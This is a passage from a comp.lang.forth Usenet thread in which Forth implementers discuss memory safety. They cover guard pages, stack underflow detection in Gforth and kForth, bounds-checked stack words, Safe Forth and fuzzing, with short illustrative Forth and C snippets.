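    is classified as an overflow, matching the two Gforth messages above.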

    - anton

  • From Krishna Myneni@21:1/5 to Krishna Myneni on Sat Mar 2 10:17:57 2024
    On 3/2/24 10:08, Krishna Myneni wrote:
    On 3/2/24 09:39, minforth wrote:
    Harden these without runtime checks:
    : RT1 2 3e recurse ;
    : RT2 drop fdrop recurse ;

    Let's see what python does:

    def rt1():
       return rt1()

    rt1()
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "<stdin>", line 2, in rt1
      File "<stdin>", line 2, in rt1
      File "<stdin>", line 2, in rt1
      [Previous line repeated 996 more times]
    RecursionError: maximum recursion depth exceeded

    Clearly it is doing a runtime check. Similarly one could have RECURSE in Forth perform a runtime check to enforce a recursion depth limit, and
    indeed this type of error is caught by several Forth systems:

    === kForth example ===
    : rt1 recurse ;
     ok
    rt1
    Line 2:  VM Error(-258): Return stack corrupt
    rt1
    === end example ===

    === Gforth example ===
    : rt1 recurse ;  ok
    rt1
    *the terminal*:2:1: error: Return stack overflow
    >>>rt1<<<
    === end example ===


    To be clear, if you try to fill up the fp or data stack, as with your
    rt1 example, kForth does give a segfault (and hence is susceptible to an exploit), while Gforth still gives the same error.

    --
    Krishna

  • From Krishna Myneni@21:1/5 to Anton Ertl on Sat Mar 2 11:18:14 2024
    On 3/2/24 10:43, Anton Ertl wrote:
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    On 3/2/24 10:08, Krishna Myneni wrote:
    === Gforth example ===
    : rt1 recurse ;  ok
    rt1
    *the terminal*:2:1: error: Return stack overflow
    >>>rt1<<<
    === end example ===


    To be clear, if you try to fill up the fp or data stack, as with your
    rt1 example, kForth does give a segfault (and hence is susceptible to an
    exploit), while Gforth still gives the same error.

    In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
    into a guard page. The signal handler then looks at the offending
    address, and guesses that an access close to the bottom of a stack is
    an underflow of that stack, and correspondingly for accesses close to
    the top of a stack. This can be seen as follows:

    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<


    Nice. The use of guard pages is something I need to look into to avoid
    memory leaks or corruption for the stacks. Does this mean Gforth is
    immune to arbitrary code execution attacks for the fp and data stack
    overflow and underflow conditions?

    --
    Krishna

  • From Paul Rubin@21:1/5 to dxf on Sat Mar 2 10:39:23 2024
    dxf <dxforth@gmail.com> writes:
    It's good to have an application that works as planned but how does one
    that misbehaves translate to 'security risk'

    If the misbehaviour is related to the program input, and the input is
    supplied by an attacker, they will look for an input that breaks security.

    and how does 'memory-safe' prevent that?

    "Prevent" is too strong a term, but it helps. A classic attack is when
    you have a memory buffer on the stack, but accesses to it are not bounds checked. That means the attacker can overwrite stuff on the stack after
    the memory buffer, such as the procedure's return address. That means
    the attacker can make the program jump to the location of their choice,
    i.e. a location containing a security attack. See:

    https://en.wikipedia.org/wiki/Return-oriented_programming

    That may be their belief (fancy word for hope) but do they have anything
    to back it up?

    It's unclear what they mean, but it's certainly the case that studying
    the historical corpus of CVE's tells us things about common types of
    attacks. That tells us what areas need attention.

    Regarding runtime checks: in C++, if you access an array as a[i], there
    is no runtime check and thus there is a potential out-of-range memory
    access. If you instead say a.at(i), there is a runtime check, so you
    get the right result if the index is in range, but raise an exception otherwise. What I've found in practice is that there is almost no
    slowdown. I suspect that the memory access itself is slower than the
    range check, even though the data is usually in the CPU cache. So runtime checks are usually worth the small cost.

  • From Anton Ertl@21:1/5 to Krishna Myneni on Sat Mar 2 18:03:32 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    Does this mean Gforth is
    immune to arbitrary code execution attacks for the fp and data stack
    overflow and underflow conditions?

    Technically, one might answer "yes", but there are stack depth
    violations that don't result in a stack overflow or underflow, and
    that can lead to arbitrary code execution in Gforth. A simple example
    is:

    : bla ." bla" ;

    : foo >r ;

    ' bla >body foo \ prints "bla"

    Essentially, there are far too few guardrails in Gforth for the guard
    pages to provide significant safety. For Gforth they are just a
    convenience feature.

    However, the idea of Safe Forth is to eliminate all these other ways
    towards arbitrary code execution, and in Safe Forth the guard pages
    will close the hole that stack overflows and underflows would
    otherwise leave open.

    Note that guard pages require OS support; Gforth uses the mprotect()
    system call (of modern (since ~1990) Unix systems) for that.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

  • From minforth@21:1/5 to All on Sat Mar 2 19:47:05 2024
    You can compile in DEBUG/RELEASE mode, whereby runtime checks
    are no longer included in RELEASE mode. But these are quasi
    pre-mortem traps, just like guard pages - they do not make Forth
    safer as a language, for that it would need a-priori error traps.

    An example:

    : TE1 -1 dup c! ;

    TE1 contains two errors: -1 is not a char and -1 is not a permitted
    memory address. It must be possible to catch these during compilation.

    Even C, that notoriously vulnerable language, has assert macros for
    DEBUG builds. In Forth, you have to create asserts yourself.

  • From Anton Ertl@21:1/5 to minforth on Sat Mar 2 22:29:49 2024
    minforth@gmx.net (minforth) writes:
    In Forth, you have to create asserts yourself.

    Or you can use Gforth, which has them since at least gforth-0.2
    (released 1996). See <https://gforth.org/manual/Assertions.html#index-assert_0028>.
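
    For illustration, a minimal sketch of how Gforth's assert( ... ) could
    catch the first of the two errors in TE1 at run time. CHECKED-C! is a
    hypothetical word, not part of Gforth, and an assertion like this cannot
    tell whether -1 is a valid address, so only the character range is checked:

    ```forth
    \ Hypothetical word; assert( ... ) is Gforth's assertion syntax.
    \ The code between assert( and ) must leave just a flag.
    : checked-c! ( c c-addr -- )
      assert( over 256 u< )   \ c must fit in an 8-bit char; -1 fails here
      c! ;
    ```

    With assertions enabled (Gforth's default), "-1 some-addr checked-c!"
    aborts with an assertion failure instead of storing; the manual page
    above describes how assertion levels can be compiled out for release builds.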

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

  • From Anton Ertl@21:1/5 to Paul Rubin on Sat Mar 2 22:21:19 2024
    Paul Rubin <no.email@nospam.invalid> writes:
    It's unclear what they mean, but it's certainly the case that studying
    the historical corpus of CVE's tells us things about common types of
    attacks. That tells us what areas need attention.

    My impression from reading articles like
    <https://lwn.net/Articles/961978/> and the discussions after them is
    that in recent years CVEs have become a metric for evaluating security researchers, and, like any other metric, are therefore gamed. So
    these days a statistic about CVEs tells us only which kinds of bugs
    (assumed to be vulnerabilities) those researchers find most often.

    What I've found in practice is that there is almost no
    slowdown. I suspect that the memory access itself is slower than the
    range check, even when it usually is within the cpu cache.

    On a modern OoO processor, if the program is dependence-bound rather
    than resource-bound, the instructions for the range check cost very
    little, because they do not add to the dependence chains in the usual
    case (when the access is in range).

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

  • From Krishna Myneni@21:1/5 to Anton Ertl on Sat Mar 2 17:07:02 2024
    On 3/2/24 10:43, Anton Ertl wrote:
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    On 3/2/24 10:08, Krishna Myneni wrote:
    === Gforth example ===
    : rt1 recurse ;  ok
    rt1
    *the terminal*:2:1: error: Return stack overflow
    >>>rt1<<<
    === end example ===


    To be clear, if you try to fill up the fp or data stack, as with your
    rt1 example, kForth does give a segfault (and hence is susceptible to an
    exploit), while Gforth still gives the same error.

    In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
    into a guard page. The signal handler then looks at the offending
    address, and guesses that an access close to the bottom of a stack is
    an underflow of that stack, and correspondingly for accesses close to
    the top of a stack. This can be seen as follows:

    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<


    In the version of Gforth which I have (0.7.9_20220120),

    fp@ 32769 - c@
    *the terminal*:5:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<

    However,

    fp@ 65536 - c@ ok 1

    and, worse,

    1 fp@ 65536 - c! ok

    So the guard pages are not a solution to pointer arithmetic bugs with
    the stack pointers.

    To make stack access memory safe, there has to be bounds checks on
    reading and writing from/to stacks. This suggests that stacks should be
    arrays and stack operations always involve array read/write from arrays
    with enforced bounds checking e.g. something like

    : DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
    : OVER STACK[ tos 1+ ]@ ;

    etc., where ]@ and ]! perform bounds checks.
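
    To make the ]@ / ]! idea concrete, a minimal sketch in standard Forth,
    assuming each array stores its element count in its first cell.
    CHECKED-ARRAY, ELEM-ADDR and the choice of throw code -9 ("invalid
    memory address") are illustrative assumptions, not kForth's or Gforth's API:

    ```forth
    \ Hypothetical layout: first cell = element count, then the elements.
    : checked-array ( n "name" -- )  create dup , cells allot ;

    \ (index, array) -> element address, or THROW -9 if out of range.
    \ U< also rejects negative indices, which look huge as unsigned.
    : elem-addr ( i arr -- addr )
      2dup @ u< 0= if -9 throw then
      cell+ swap cells + ;

    : ]@ ( arr i -- x )   swap elem-addr @ ;
    : ]! ( x arr i -- )   swap elem-addr ! ;
    ```

    Usage in the style of the notation above: "16 checked-array stack["
    followed by "7 stack[ 0 ]!" and "stack[ 0 ]@", while "stack[ 16 ]@" throws.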

    I haven't yet looked at your paper on SafeForth.

    --
    Krishna

  • From Ron AARON@21:1/5 to Krishna Myneni on Sun Mar 3 07:54:49 2024
    One of the criteria for 8th was security -- among other things, making
    it very difficult to do unsafe memory operations. Within 8th itself you
    can't; but of course, with the FFI anything is possible.

    On 01/03/2024 17:54, Krishna Myneni wrote:
    I'm wondering what the CS Forth users and Forth systems developers make
    of the renewed recent push for use of memory-safe languages. Certainly
    Forth can add the type of contractual safety requirements e.g.,
    implementing bounds checking, of a "memory-safe language". Do we need to
    work on libraries for these provisions?

    Opinions?

    --
    Krishna Myneni


  • From Anton Ertl@21:1/5 to Krishna Myneni on Sun Mar 3 07:25:20 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    On 3/2/24 10:43, Anton Ertl wrote:
    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<


    In the version of Gforth which I have (0.7.9_20220120),

    fp@ 32769 - c@
    *the terminal*:5:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<

    However,

    fp@ 65536 - c@ ok 1

    and, worse,

    1 fp@ 65536 - c! ok

    So the guard pages are not a solution to pointer arithmetic bugs with
    the stack pointers.

    Yes, that is not their intention and not the intention of these
    examples. The intention of these examples is to show that any memory
    access will be interpreted as a stack underflow or overflow if it is
    to a certain range of addresses.

    A more serious issue is that, as implemented in Gforth (in particular, gforth-fast), stack underflows can go undetected in some cases: On
    Gforth on an AMD64 system, with the data stack being empty:

    600 pick ok 1

    On gforth-fast, with the data stack being empty:

    : foo 600 0 ?do nip loop cr . ; foo
    0
    *the terminal*:1:33: error: Stack underflow
    : foo 600 0 ?do nip loop cr . ; >>>foo<<<
    Backtrace:
    kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw

    Note that FOO actually performs the "cr .", so the stack underflow is
    not detected by an access to the guard page. Instead, the text
    interpreter checks the stack pointer and reports a stack underflow.
    The non-detection of the stack underflow is because NIP is implemented
    as:

    $7F30E3C72C90 nip 1->1
    7F30E3917557: add r13,$08 #update sp

    With the gforth engine, a similar scenario (involving DROP) is avoided
    because in this engine DROP loads the value being dropped exactly to
    trigger stack underflow reports where they happen:

    $7F55EBFA6C98 drop 0->0
    7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces)
    7F55EBAC51C4: add r15,$08 #update ip
    7F55EBAC51C8: mov rax,[r14] #load dropped value
    7F55EBAC51CB: add r14,$08 #update sp

    Neither the deep PICK nor the loop that just NIPs or DROPs occur in
    practice.

    The motivation for the otherwise unnecessary load in DROP (in gforth)
    is code sequences like

    drop 1

    in cases where the stack is empty. The load in DROP results in
    detecting the stack underflow at the DROP rather than at the "1".
    Reporting a stack underflow at an operation that just pushes can
    produce a WTF moment in the programmer; the gforth engine exists to
    make debugging easier, and that includes avoiding such moments.

    To make stack access memory safe, there has to be bounds checks on
    reading and writing from/to stacks. This suggests that stacks should be arrays and stack operations always involve array read/write from arrays
    with enforced bounds checking e.g. something like

    : DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
    : OVER STACK[ tos 1+ ]@ ;

    etc., where ]@ and ]! perform bounds checks.

    With guard pages, that's not necessary. The normal bounded-depth
    stack accesses (of words like 2DROP or 2OVER) are sure to hit the
    guard pages if the stack is out-of-bounds; you may want to perform an
    otherwise unnecessary load on words like NIP, DROP, 2DROP etc. that do
    not otherwise use (and thus load) the stack values that they consume,
    but that's much cheaper than putting bounds checks on every stack
    access. For unbounded stack-access words like PICK, a bounds check is appropriate.
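
    A minimal sketch of such a bounds-checked PICK in standard Forth.
    CHECKED-PICK is a hypothetical name; it only assumes DEPTH and the
    standard throw code -4 (stack underflow):

    ```forth
    \ Hypothetical CHECKED-PICK: PICK preceded by an explicit depth test.
    : checked-pick ( xu ... x0 u -- xu ... x0 xu )
      dup depth 2 - u<     \ u < number of items below u?  (u+1 items needed)
      0= if -4 throw then  \ -4: stack underflow
      pick ;
    ```

    With the data stack empty, "600 checked-pick" throws -4 instead of
    silently fetching whatever lies below the stack, as in the
    "600 pick ok 1" example above.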

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

  • From minforth@21:1/5 to All on Sun Mar 3 08:21:30 2024
    You can run around in circles here, the basic problem is that there is
    no formal specification for what a safe programming language is.
    Analyses on the subject are dominated by the following: Memory errors,
    type errors, range errors, race condition errors.

    In order to develop Forth more in this direction, we would first need
    a specification on "Hardened Forth" that is dedicated to these error
    areas - and also marks UBs with defined exception codes. Ideally
    accompanied by a test suite so that every Forth system developer can
    check their own system.

  • From Krishna Myneni@21:1/5 to minforth on Sun Mar 3 07:03:01 2024
    On 3/2/24 13:47, minforth wrote:
    You can compile in DEBUG/RELEASE mode, whereby runtime checks
    are no longer included in RELEASE mode. But these are quasi
    pre-mortem traps, just like guard pages - they do not make Forth
    safer as a language, for that it would need a-priori error traps.

    An example:

    : TE1 -1 dup c! ;

    TE1 contains two errors: -1 is not a char and -1 is not a permitted
    memory address. It must be possible to catch these during compilation.

    kForth, from its beginning, would never execute the C! in your example:

    Ready!
    : TE1 -1 dup c! ;
    ok
    TE1
    Line 2: VM Error(-256): Not data type ADDR
    TE1

    It performs run-time type checking for address arguments, at about 15%
    cost in speed for most benchmarks.

    --
    Krishna

  • From Krishna Myneni@21:1/5 to minforth on Sun Mar 3 07:07:07 2024
    On 3/3/24 02:21, minforth wrote:
    You can run around in circles here, the basic problem is that there is
    no formal specification for what a safe programming language is.
    Analyses on the subject are dominated by the following: Memory errors,
    type errors, range errors, race condition errors.

    In order to develop Forth more in this direction, we would first need
    a specification on "Hardened Forth" that is dedicated to these error
    areas - and also marks UBs with defined exception codes. Ideally
    accompanied by a test suite so that every Forth system developer can
    check their own system.

    I'm not smart enough for a top down approach to this problem. The Forth approach is one that I can take though. Start with small well-defined
    problems, and try to find solutions for those. Build up a bigger picture
    from those solutions.

    --
    Krishna

  • From Krishna Myneni@21:1/5 to Anton Ertl on Sun Mar 3 06:58:02 2024
    On 3/3/24 01:25, Anton Ertl wrote:
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    On 3/2/24 10:43, Anton Ertl wrote:
    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<


    In the version of Gforth which I have (0.7.9_20220120),

    fp@ 32769 - c@
    *the terminal*:5:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<

    However,

    fp@ 65536 - c@ ok 1

    and, worse,

    1 fp@ 65536 - c! ok

    So the guard pages are not a solution to pointer arithmetic bugs with
    the stack pointers.

    Yes, that is not their intention and not the intention of these
    examples. The intention of these examples is to show that any memory
    access will be interpreted as a stack underflow or overflow if it is
    to a certain range of addresses.

    A more serious issue is that, as implemented in Gforth (in particular, gforth-fast), stack underflows can go undetected in some cases: On
    Gforth on an AMD64 system, with the data stack being empty:

    600 pick ok 1

    On gforth-fast, with the data stack being empty:

    : foo 600 0 ?do nip loop cr . ; foo
    0
    *the terminal*:1:33: error: Stack underflow
    : foo 600 0 ?do nip loop cr . ; >>>foo<<<
    Backtrace:
    kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw

    Note that FOO actually performs the "cr .", so the stack underflow is
    not detected by an access to the guard page. Instead, the text interpreter checks the stack pointer and reports a stack underflow.
    The non-detection of the stack underflow is because NIP is implemented
    as:

    $7F30E3C72C90 nip 1->1
    7F30E3917557: add r13,$08 #update sp

    With the gforth engine, a similar scenario (involving DROP) is avoided because in this engine DROP loads the value being dropped exactly to
    trigger stack underflow reports where they happen:

    $7F55EBFA6C98 drop 0->0
    7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces)
    7F55EBAC51C4: add r15,$08 #update ip
    7F55EBAC51C8: mov rax,[r14] #load dropped value
    7F55EBAC51CB: add r14,$08 #update sp

    Neither the deep PICK nor the loop that just NIPs or DROPs occur in
    practice.

    The motivation for the otherwise unnecessary load in DROP (in gforth)
    is code sequences like

    drop 1

    in cases where the stack is empty. The load in DROP results in
    detecting the stack underflow at the DROP rather than at the "1".
    Reporting a stack underflow at an operation that just pushes can
    produce a WTF moment in the programmer; the gforth engine exists to
    make debugging easier, and that includes avoiding such moments.

    To make stack access memory safe, there has to be bounds checks on
    reading and writing from/to stacks. This suggests that stacks should be
    arrays and stack operations always involve array read/write from arrays
    with enforced bounds checking e.g. something like

    : DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
    : OVER STACK[ tos 1+ ]@ ;

    etc., where ]@ and ]! perform bounds checks.

    With guard pages, that's not necessary. The normal bounded-depth
    stack accesses (of words like 2DROP or 2OVER) are sure to hit the
    guard pages if the stack is out-of-bounds; you may want to perform an otherwise unnecessary load on words like NIP, DROP, 2DROP etc. that do
    not otherwise use (and thus load) the stack values that they consume,
    but that's much cheaper than putting bounds checks on every stack
    access. For unbounded stack-access words like PICK, a bounds check is appropriate.


    That's a pretty good approach, to use guard pages for stack access words
    which are guaranteed to trigger a signal, and use bounds checking for
    the remaining ones.

    The intent of the stack array access was to avoid stack pointer
    arithmetic altogether. Stack array access words provide a safe alternative
    to doing stack pointer arithmetic in Forth code. Pointer arithmetic
    appears to be the source of a lot of memory safety problems.

    --
    Krishna

  • From minforth@21:1/5 to All on Sun Mar 3 16:08:26 2024
    That's patchwork, but if it is sufficient for a program,
    good for the program. As for language safety....

    For instance, I wouldn't define how to react on
    0 BASE !
    that could lead to a plethora of system-dependent crashes.
    Or on
    -1. 3 UM/MOD
    probably throw exception code -11 for result out of range
    even when 'range' is undeclared or only implicit.
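
    One way to give such conditions defined behaviour is to map them to
    standard throw codes. A minimal sketch; the words CHECKED-UM/MOD and
    CHECKED-BASE! are hypothetical, and the base check assumes the usual
    2..36 range of supported bases:

    ```forth
    \ Hypothetical checked variants: ambiguous conditions become THROWs.
    : checked-um/mod ( ud u -- urem uquot )
      dup 0= if -10 throw then       \ -10: division by zero
      \ quotient fits in one cell iff high cell of ud < divisor (unsigned)
      2dup u< 0= if -11 throw then   \ -11: result out of range
      um/mod ;

    : checked-base! ( u -- )
      dup 2 37 within 0= if -24 throw then   \ -24: invalid numeric argument
      base ! ;
    ```

    With these, "-1. 3 checked-um/mod" throws -11 and "0 checked-base!"
    throws -24, instead of leaving the outcome to the system.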

    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

  • From Anton Ertl@21:1/5 to Krishna Myneni on Sun Mar 3 15:51:07 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    The intent of the stack array access was to avoid stack pointer
    arithmetic altogether. Stack array access words provide a safe alternative
    to doing stack pointer arithmetic in Forth code. Pointer arithmetic
    appears to be the source of a lot of memory safety problems.

    At the machine level and the standard Forth level, every array access
    performs address arithmetic. Given that standard Forth does not
    expose the implementation of the stacks, there is no need to use some
    specific implementation for them. One may wonder, though, if using 4
    stacks with guard pages around them (i.e., at least 9 pages per task,
    set up with 6 system calls) is too expensive for multi-tasking; I
    think Gforth currently only does it for the main task.

    There are architectures (in particular, the 80286) that provide
    hardware support for treating stretches of memory as segments with
    bounds checking, and the idea probably was that every array becomes a
    segment (not sure about structures; the 80286 supports only 8192
    segments, which seems a little low if every structure needs a segment),
    but anyway, using segments was too cumbersome, slow and limited, so
    they fell by the wayside in the descendants of the
    architecture (IA-32, AMD64).

    In any case, yes, in Safe Forth there are no addresses at the language
    level. You have objects with value-flavoured fields, and arrays with indexed-fetch and indexed-store words. But in the implementation of
    Safe Forth, there will certainly be address arithmetic.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

  • From Anton Ertl@21:1/5 to minforth on Sun Mar 3 16:14:27 2024
    minforth@gmx.net (minforth) writes:
    You can run around in circles here, the basic problem is that there is
    no formal specification for what a safe programming language is.

    It was certainly an interesting aspect of my work on Safe Forth that I
    first had to understand better what memory safety is; I had the "I
    know it when I see it" kind of understanding, but that was not enough.
    But I succeeded in understanding it better, and you can read the paper
    if you want to know more about it.

    Analyses on the subject are dominated by the following: Memory errors,
    type errors, range errors, race condition errors.

    Safe Forth only tries to solve memory errors. That makes it necessary
    to deal with some type errors and some range errors, but not all of
    them, and there are no ambitions at the moment to harden Safe Forth
    more against those. My idea on how to perform multitasking in Safe
    Forth does not provide shared memory, so there are no race conditions.

    In order to develop Forth more in this direction, we would first need
    a specification on "Hardened Forth" that is dedicated to these error
    areas - and also marks UBs with defined exception codes.

    I know "UB" from the C language lawyers. They love the concept of
    "undefined behaviour" so much that they have created a 2-letter
    acronym for it. A safe language does not have undefined behaviour,
    and if you define the behaviour on some kind of condition to perform
    an exception, that behaviour is certainly not undefined.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

  • From Paul Rubin@21:1/5 to minforth on Sun Mar 3 11:32:46 2024
    minforth@gmx.net (minforth) writes:
    You can run around in circles here, the basic problem is that there is
    no formal specification for what a safe programming language is.

    From https://en.wikipedia.org/wiki/Ada_(programming_language)#History :

    HOLWG crafted the Steelman language requirements, a series of
    documents stating the requirements they felt a programming language
    should satisfy. Many existing languages were formally reviewed, but
    the team concluded in 1977 that no existing language met the
    specifications.

    They put out a call for proposals for a new language to be designed. The
    eventual winner was Ada, but that choice came with some controversy at
    the time. There were competing proposals that some people felt were
    less bloated and still fulfilled the intended goals.

  • From minforth@21:1/5 to All on Sun Mar 3 19:56:44 2024
    Don't look elsewhere for UBs; the Forth Standard is chock-full of "ambiguous conditions".

  • From minforth@21:1/5 to Paul Rubin on Sun Mar 3 20:00:27 2024
    Paul Rubin wrote:
    They put out a call for proposals for a new language to be designed. The
    eventual winner was Ada, but that choice came with some controversy at
    the time. There were competing proposals that some people felt were
    less bloated and still fulfilled the intended goals.

    Misra-C is an example. There is no language specification, but quite a
    number of rules against which a C program can be checked.

  • From Paul Rubin@21:1/5 to minforth on Sun Mar 3 14:08:29 2024
    minforth@gmx.net (minforth) writes:
    Misra-C is an example. There is no language specification, but quite a
    number of rules against which a C program can be checked.

    Misra-C has some sensible rules, but it's still C, which comes nowhere
    near meeting the requirements that the working group (that chose Ada)
    was looking for. Maybe some subset of C++ could have done it.
    C doesn't have nearly enough type safety.

  • From Krishna Myneni@21:1/5 to minforth on Sun Mar 3 17:02:44 2024
    On 3/3/24 10:08, minforth wrote:
    That's patchwork, but if it is sufficient for a program,
    good for the program. As for language safety....

    ...
    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

    Perhaps not, but I wrote my Forth system to provide some hand-holding, primarily for my own needs. My expectation is that the demand for Forth
    systems which don't address safety concerns will rapidly drop to zero.

    --
    Krishna

  • From Ron AARON@21:1/5 to dxf on Mon Mar 4 07:06:42 2024
    On 04/03/2024 3:10, dxf wrote:
    On 3/03/2024 4:54 pm, Ron AARON wrote:
    One of the criteria for 8th was security -- among other things, making it very difficult to do unsafe memory operations.

    Has it paid off - by which I mean completed apps that out of the blue access invalid memory? I'm curious as to what exactly is behind the high rate of 'memory errors' that govt et al is reporting because in my limited experience programming in Forth, I'm just not seeing any. I wonder if it has something to do with the practices employed in those other languages - such as the use of third-party libraries which programmers use essentially on faith.

    That's a good question, for which I don't have an answer nor even any
    metrics on which to base one.

    While I, personally, rarely write code that has those sorts of issues
    (at least, not in 30 years), I have worked in places where they were
    fairly common. It depends a lot on the expertise and attention to detail
    of the programmers, I think.

    Since 8th is intended for "application programmers" who may have little experience, and since one of its primary goals is "security", I've made
    it difficult to smash memory -- whether on purpose or accidentally. Of
    course, that makes it stray considerably from standard Forths.

    TL;DR: I don't really know.

  • From minforth@21:1/5 to Krishna Myneni on Mon Mar 4 07:52:28 2024
    Krishna Myneni wrote:

    On 3/3/24 10:08, minforth wrote:
    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

    Perhaps not, but I wrote my Forth system to provide some hand-holding, primarily for my own needs. My expectation is that the demand for Forth systems which don't address safety concerns will rapidly drop to zero.

    IIRC there have been a few Forth applications at NASA and for astronomy
    (e.g. see Forth Inc. web site). I've already wondered how much convincing
    had to be done for NASA not to disqualify Forth.

  • From minforth@21:1/5 to Ron AARON on Mon Mar 4 07:39:36 2024
    Ron AARON wrote:
    While I, personally, rarely write code that has those sorts of issues
    (at least, not in 30 years), I have worked in places where they were
    fairly common. It depends a lot on the expertise and attention to detail
    of the programmers, I think.

    I think it's also a question of the scale of the software. Forth programs
    are usually microscopically small and manageable. Typical modern software
    can reach gigabytes and must be created by a team of developers who sometimes don't even work in the same place. The attack surface for errors is therefore orders of magnitude larger. That calls for many more a priori security features built into the programming language and development tools, followed by software-engineering test procedures.

  • From Ron AARON@21:1/5 to minforth on Mon Mar 4 10:13:06 2024
    On 04/03/2024 9:39, minforth wrote:
    Ron AARON wrote:
    While I, personally, rarely write code that has those sorts of issues
    (at least, not in 30 years), I have worked in places where they were
    fairly common. It depends a lot on the expertise and attention to
    detail of the programmers, I think.

    I think it's also a question of the scale of the software. Forth programs
    are usually microscopically small and manageable. Typical modern software
    can reach gigabytes and must be created by a team of developers who
    sometimes don't even work in the same place. The attack surface for errors
    is therefore orders of magnitude larger. That calls for many more a priori
    security features built into the programming language and development
    tools, followed by software-engineering test procedures.

    Yes, this too. Even when people are all in the same location, getting
    everyone to work in the same direction and same style and follow the
    rules can be challenging.

  • From Anton Ertl@21:1/5 to dxf on Mon Mar 4 07:57:14 2024
    dxf <dxforth@gmail.com> writes:
    Has it paid off - by which I mean completed apps that out of the blue access invalid memory?

    Out of the blue? That's not how it happens.

    I'm curious as to what exactly is behind the high rate of
    'memory errors' that govt et al is reporting because in my limited experience programming in Forth, I'm just not seeing any.

    If you don't look, or if you look in the wrong place, you don't see.
    The fact that a primitive technique like throwing random input at a
    program caused many supposedly-debugged programs to misbehave shows
    that programmers have blind spots, especially when it comes to their
    own programs. And this has nothing to do with "gigabytes of
    software", this was already found at times when machines were so small
    that sizes of large programs were on the order of kilowords <https://en.wikipedia.org/wiki/Fuzzing#Early_random_testing>.
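    The early random-testing experiments can be reproduced in miniature. The following C sketch is illustrative only: `parse_record` is a hypothetical length-prefixed parser (the first byte gives the payload length), and the harness feeds it random buffers from `rand()` with a fixed seed, counting every result that breaks the parser's stated contract.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define OUT_MAX 16

/* Hypothetical parser: in[0] is the payload length, the payload follows.
   Copies the payload into out (capacity OUT_MAX) and returns its length,
   or -1 if the record is truncated or too large. */
int parse_record(const unsigned char *in, size_t len, unsigned char out[OUT_MAX])
{
    if (len == 0)
        return -1;
    size_t n = in[0];
    if (n > len - 1 || n > OUT_MAX)   /* both checks are needed */
        return -1;
    memcpy(out, in + 1, n);
    return (int)n;
}

/* Feed `iterations` random buffers to parse_record and count results that
   break its contract: the result must be -1 or fit in both buffers. */
int fuzz_parse_record(unsigned seed, int iterations)
{
    unsigned char in[64], out[OUT_MAX];
    int failures = 0;
    srand(seed);
    for (int i = 0; i < iterations; i++) {
        size_t len = (size_t)(rand() % (int)sizeof in);   /* 0..63 bytes */
        for (size_t j = 0; j < len; j++)
            in[j] = (unsigned char)(rand() % 256);
        int r = parse_record(in, len, out);
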